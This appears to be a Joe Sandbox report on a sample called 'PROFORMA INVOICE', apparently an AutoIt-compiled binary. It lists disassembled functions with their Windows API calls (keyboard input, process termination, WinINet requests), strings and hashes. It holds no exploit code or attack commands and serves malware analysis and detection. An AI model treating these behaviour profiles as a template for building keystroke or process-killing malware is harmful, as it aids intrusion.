Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 3a1a25636ac68544d70689063590b76bc38c1c958afaab4a124fdf993662619d
Instruction ID: 42b5f7a8857c97d64cf982cb555a523dbfb4ba1beb354601b8b0c563394c8a70
Opcode Fuzzy Hash: 3a1a25636ac68544d70689063590b76bc38c1c958afaab4a124fdf993662619d
Instruction Fuzzy Hash: CB0184B5E00258BFFF109BA58C45B5EBFB9EB48351F044066EA04AB290D6719C01DB60

Function 00F87B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00F87B47

Part of subcall function 00F8123A: __initp_misc_winsig.LIBCMT ref: 00F8125E
Part of subcall function 00F8123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F87F51
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F87F65
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F87F78
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F87F8B
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F87F9E
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F87FB1
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F87FC4
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F87FD7
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F87FEA
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F87FFD
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F88010
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F88023
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F88036
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F88049
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F8805C
Part of subcall function 00F8123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00F8806F

__mtinitlocks.LIBCMT ref: 00F87B4C

Part of subcall function 00F87E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0101AC68,00000FA0,?,?,00F87B51,00F85E77,01016C70,00000014), ref: 00F87E41

__mtterm.LIBCMT ref: 00F87B55

Part of subcall function 00F87BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F87B5A,00F85E77,01016C70,00000014), ref: 00F87D3F
Part of subcall function 00F87BBD: _free.LIBCMT ref: 00F87D46
Part of subcall function 00F87BBD: DeleteCriticalSection.KERNEL32(0101AC68,?,?,00F87B5A,00F85E77,01016C70,00000014), ref: 00F87D68

__calloc_crt.LIBCMT ref: 00F87B7A
GetCurrentThreadId.KERNEL32 ref: 00F87BA3

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 73883552ad75b944e12920b9361aa9dc293baec8ee668d080f8afb5c0102dd01
Instruction ID: 45098a4d384b755d04ff8690f2496474e2548f2d1bdbc5c2fa18ddd31ed06756
Opcode Fuzzy Hash: 73883552ad75b944e12920b9361aa9dc293baec8ee668d080f8afb5c0102dd01
Instruction Fuzzy Hash: 47F0963251D75159E62476347C07BCB3685AF41730B300699F8A4C50DAFF2DC8427360

Function 00F627EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F6281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00F62825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F62830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F6283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00F62843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F6284B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: cbae22a67d26ad0621a206633d3e39cf8302b6d8f19352996ac8beba33d8a419
Instruction ID: 399c647e48bc31d0dfe43fba383ce976f8f228e6cdcd6550361d9b01866c5623
Opcode Fuzzy Hash: cbae22a67d26ad0621a206633d3e39cf8302b6d8f19352996ac8beba33d8a419
Instruction Fuzzy Hash: 7C0167B0902B5EBDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00FA9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 96584c2ac30fd033e4e653acdddfd168a8b459bd3c02bbdad893bbacf74eb978
Instruction ID: 7902264cc1f215eee9cf3a196cd17b56110cf6e7793b57ac29ed065d54963d2e
Opcode Fuzzy Hash: 96584c2ac30fd033e4e653acdddfd168a8b459bd3c02bbdad893bbacf74eb978
Instruction Fuzzy Hash: 55018672605215ABD7151F54EC88DEB7779FF89711704043AF603DA4A0DBA99800FB51

Function 00FA7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FA7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FA7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00FA7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FA7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FA7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FA7C4C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6d7504c505c5782e50473bb0c6588a90850350efd7a1c03e131ad0f8f0167199
Instruction ID: 924b2f43532e78035608fd1d2ebe378d9bbfdb452a3020084c5afca69544cda9
Opcode Fuzzy Hash: 6d7504c505c5782e50473bb0c6588a90850350efd7a1c03e131ad0f8f0167199
Instruction Fuzzy Hash: 1EF03A7224219CBFE7215B529C4EEEF7B7CEFC6B11F000018FA0199451E7A45A41E6B5

Function 00FA9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00FA9A33
EnterCriticalSection.KERNEL32(?,?,?,?,00FD5DEE,?,?,?,?,?,00F6ED63), ref: 00FA9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00FD5DEE,?,?,?,?,?,00F6ED63), ref: 00FA9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00FD5DEE,?,?,?,?,?,00F6ED63), ref: 00FA9A5E

Part of subcall function 00FA93D1: CloseHandle.KERNEL32(?,?,00FA9A6B,?,?,?,00FD5DEE,?,?,?,?,?,00F6ED63), ref: 00FA93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00FA9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00FD5DEE,?,?,?,?,?,00F6ED63), ref: 00FA9A78

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 4c659e6697c38def7b9b578c59eae98e9a56ba8da3cbd118778d3e18fba01ec8
Instruction ID: b66591e54683172c7bffa21673c62074655dcc972b85d78b0e8a6cff06c9bb54
Opcode Fuzzy Hash: 4c659e6697c38def7b9b578c59eae98e9a56ba8da3cbd118778d3e18fba01ec8
Instruction Fuzzy Hash: 73F0BE72545219ABD7111FA4ECC8DAA3739FF85301B040422F203998A0CBB99800FB51

Function 00F61CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00F7F4EA: std::exception::exception.LIBCMT ref: 00F7F51E
Part of subcall function 00F7F4EA: __CxxThrowException@8.LIBCMT ref: 00F7F533

__swprintf.LIBCMT ref: 00F61EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F61D49

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 634a9e2a4d388fe66c849a6f886eefc3c1a2c744acaec4a86e9a9e5592d4b445
Instruction ID: 578775a79256382a7cd50e1f5be2655f18828cb4292bf996d909140f9f6dffcf
Opcode Fuzzy Hash: 634a9e2a4d388fe66c849a6f886eefc3c1a2c744acaec4a86e9a9e5592d4b445
Instruction Fuzzy Hash: 8591BE725042029FCB24EF24CC96D6EB7B5BF95710F08491EF886972A1DB35ED04EB92

Function 00FBAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FBB006
CharUpperBuffW.USER32(?,?), ref: 00FBB115
VariantClear.OLEAUT32(?), ref: 00FBB298

Part of subcall function 00FA9DC5: VariantInit.OLEAUT32(00000000), ref: 00FA9E05
Part of subcall function 00FA9DC5: VariantCopy.OLEAUT32(?,?), ref: 00FA9E0E
Part of subcall function 00FA9DC5: VariantClear.OLEAUT32(?), ref: 00FA9E1A

Strings

Incorrect Parameter format, xrefs: 00FBB03E, 00FBB20B
AUTOIT.ERROR, xrefs: 00FBB11B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 49fe74a8e497305e9a70ec46e1c7b89e4dc5af339198095e0cee22c7eb00ebd2
Instruction ID: 95e70f4a9ea1ac302b1722bdb3cec4fb0fa49311db6730244a78e19d350bf9d5
Opcode Fuzzy Hash: 49fe74a8e497305e9a70ec46e1c7b89e4dc5af339198095e0cee22c7eb00ebd2
Instruction Fuzzy Hash: 98918C716083019FCB10DF25C8819AABBE4FF89750F04482DF89A9B361DB75E905EF52

Function 00FA5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7C6F4: _wcscpy.LIBCMT ref: 00F7C717

_memset.LIBCMT ref: 00FA5438
GetMenuItemInfoW.USER32(?), ref: 00FA5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FA5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FA553D

Strings

0, xrefs: 00FA5430

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: fd3289142505929bdb512424a8e9df85c04140f87b40a9bf000f9bcee2f95fdd
Instruction ID: d754ccb4b0ead2e5625026a71eb51749724078a0cfaf45613abcd9d7156f22e2
Opcode Fuzzy Hash: fd3289142505929bdb512424a8e9df85c04140f87b40a9bf000f9bcee2f95fdd
Instruction Fuzzy Hash: 555103B29047019FD714DF28C8816ABB7E9AF8BB24F08052DF895D3191DB74CD44AB52

Function 00FA0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FA02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FA02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FA0344

Strings

DllGetClassObject, xrefs: 00FA02B7

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 1d2fbd9dc137b042d4bacb3d3130adf35bf132577757a8f63ee844cb28f7b47f
Instruction ID: 3e1906ba2b5e87c42186e2935619f7cf4a1d56a6a62a2ae9a8713977f33fb80c
Opcode Fuzzy Hash: 1d2fbd9dc137b042d4bacb3d3130adf35bf132577757a8f63ee844cb28f7b47f
Instruction Fuzzy Hash: C3416DB1A00304EFDF05CF54D884B9A7BA9EF46314F1480ADAD09DF246DBB5D944EBA0

Function 00FA5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA5075
GetMenuItemInfoW.USER32 ref: 00FA5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00FA50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01021708,00000000), ref: 00FA5120

Strings

0, xrefs: 00FA506D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3a007d5dfd793c868a01efb3f912c23c79a4ed920290c799ce352a9b067e034e
Instruction ID: aa2574b84851d682f4d4c8a18ec822665c6fad7dac602b09d7818c6d5d41556d
Opcode Fuzzy Hash: 3a007d5dfd793c868a01efb3f912c23c79a4ed920290c799ce352a9b067e034e
Instruction Fuzzy Hash: 9B41F3B1204701AFD720DF24DC80F6AB7E4AF86B24F044A1EF85597292D730E904DB62

Function 00FA390C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FA3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00FA3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00FA39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00FA3A4D

Strings

mmmmmm, xrefs: 00FA399D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: mmmmmm
API String ID: 432972143-236548473
Opcode ID: 243a3c16b6af37e17ad3ec4e6772dbceb4a3bd72f92bcb487d84758bc868c521
Instruction ID: f8fe7c735186c42bce698b579c9a16985d0b63fa6c4a4fad9406cf4e002772b4
Opcode Fuzzy Hash: 243a3c16b6af37e17ad3ec4e6772dbceb4a3bd72f92bcb487d84758bc868c521
Instruction Fuzzy Hash: F04129B0E04258AEEF208B64C8467FEBBBA9F4B320F04011AF4C1561C1C7B98E85F761

Function 00FA3A61 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00FA3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00FA3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00FA3B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00FA3B92

Strings

mmmmmm, xrefs: 00FA3AF2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: mmmmmm
API String ID: 432972143-236548473
Opcode ID: b49c83388a499a74c7ad0c710ec54b24e536ea305770d645372ec63e0237c1f7
Instruction ID: fda850fcf3653601743a319cccdffa65c75f964078c692e3fd4456144c145cdd
Opcode Fuzzy Hash: b49c83388a499a74c7ad0c710ec54b24e536ea305770d645372ec63e0237c1f7
Instruction Fuzzy Hash: 413106B1E00258AEEF258B648C197FE7BAA9B97360F04015AF481971D1C7788F85F771

Function 00FC0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00FC0587

Strings

cdecl, xrefs: 00FC05DE
none, xrefs: 00FC0662
winapi, xrefs: 00FC05F8
stdcall, xrefs: 00FC0609

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: af654854f95ac6e5a9d8aea1dca8faa127716f52d4ff02ec17b571c91251670d
Instruction ID: 2b41606c2a2bcf287e963b53bd32fcdb9c3f1b59e08e90d06f898ae6cdd82e77
Opcode Fuzzy Hash: af654854f95ac6e5a9d8aea1dca8faa127716f52d4ff02ec17b571c91251670d
Instruction Fuzzy Hash: D831A170900216EFCF00EF54CD41EAEB3B8FF55310B10861EE866A76D1DB75A916EB80

Function 00F9B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F9B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F9B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 00F9B8D1

Strings

ComboBox, xrefs: 00F9B815
ListBox, xrefs: 00F9B84D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: a4c227119671a68ee60959407bb95ef55d65be649dd80f58dc2da4caaa8b4e5b
Instruction ID: df27cc9bbe3974d0f95853f3ce5e35c197bac5620ab7c32ccdf55e6f8e869677
Opcode Fuzzy Hash: a4c227119671a68ee60959407bb95ef55d65be649dd80f58dc2da4caaa8b4e5b
Instruction Fuzzy Hash: 5B21B176900108AFEB04ABA4DC869BE777DDF49360B144129F065A71E1DB794D0AB7A0

Function 00FB43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FB4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FB4457
InternetCloseHandle.WININET(00000000), ref: 00FB449E

Part of subcall function 00FB5052: GetLastError.KERNEL32(?,?,00FB43CC,00000000,00000000,00000001), ref: 00FB5067

Strings

, xrefs: 00FB4450

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

